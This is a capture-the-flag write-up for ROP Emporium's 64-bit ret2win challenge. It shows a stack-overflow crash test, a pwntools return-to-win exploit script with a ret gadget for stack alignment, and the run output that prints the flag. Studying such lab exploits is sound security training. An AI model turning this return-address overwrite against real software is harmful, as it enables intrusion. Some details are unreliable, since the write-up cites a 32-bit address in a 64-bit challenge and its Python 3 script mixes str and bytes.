Ret2Win64 - librondo.so

#rop # ret2win x86-64 ## Triage ![](https://i.imgur.com/XvWCmIJ.png) Like the website says, these challenges are based on ROPing so NX will be enbaled on all of thes. ### Disassembly main function calls vulnerable call pwnme ![](https://i.imgur.com/5P7fOxE.png) pwnme function ![](https://i.imgur.com/0oj0WSl.png) ## Vulnerability In the pwnme function, 56 bytes are read into the user_input buff but the user_input buff is on the stack -0x28 (-40) bytes off from the return address. If we supply 40 bytes, the next 4 bytes will overflow PART of the return address. Because this is a 64bit binary to overwrite all 8 bytes we need to send 8 bytes instead of 4. Confirming the vulnerability: Using python3 to get rid of the newline at the end ```bash python3 -c 'print("A"*40 + "B"*4,end="")' | strace ./ret2win ``` ```bash --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} --- +++ killed by SIGSEGV (core dumped) +++ [1] 3247930 done python3 -c 'print("A"*40 + "B"*4,end="")' | 3247931 segmentation fault (core dumped) strace ./ret2win ``` ## Exploit The binary contains a win function: ![](https://i.imgur.com/XclH0tv.png) Setting the program counter to `0x804862c` will execute the win function BUT if you run the exploit in GDB you will see it actually crashes during the call ![](https://i.imgur.com/Y5edNiF.png) This is typically due to alignment issues, ROPing to a ret instruction before ROPing to the win functions usually fixes it. ### Script ```python from pwn import * context.binary = elf = ELF("./ret2win") ret = p64(0x400755) payload = "A"*40 payload += ret payload += p64(elf.sym['ret2win']) io = process("./ret2win") gdb.attach(io) io.sendline(payload) io.interactive() ``` ### Result ```bash [*] '/home/chris/ctfs/ropemporium/ret2win/x64/ret2win' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) [+] Starting local process './ret2win': pid 3250138 [*] running in new terminal: /usr/bin/gdb -q "./ret2win" 3250138 -x "/tmp/pwn7EAQZw.gdb" [+] Waiting for debugger: Done [*] Switching to interactive mode ret2win by ROP Emporium x86_64 For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer! What could possibly go wrong? You there, may I have your input please? And don't worry about null bytes, we're using read()! > Thank you! Well done! Here's your flag: ROPE{a_placeholder_32byte_flag!} [*] Process './ret2win' stopped with exit code 0 (pid 3250138) [*] Got EOF while reading in interactive $ [*] Interrupted ```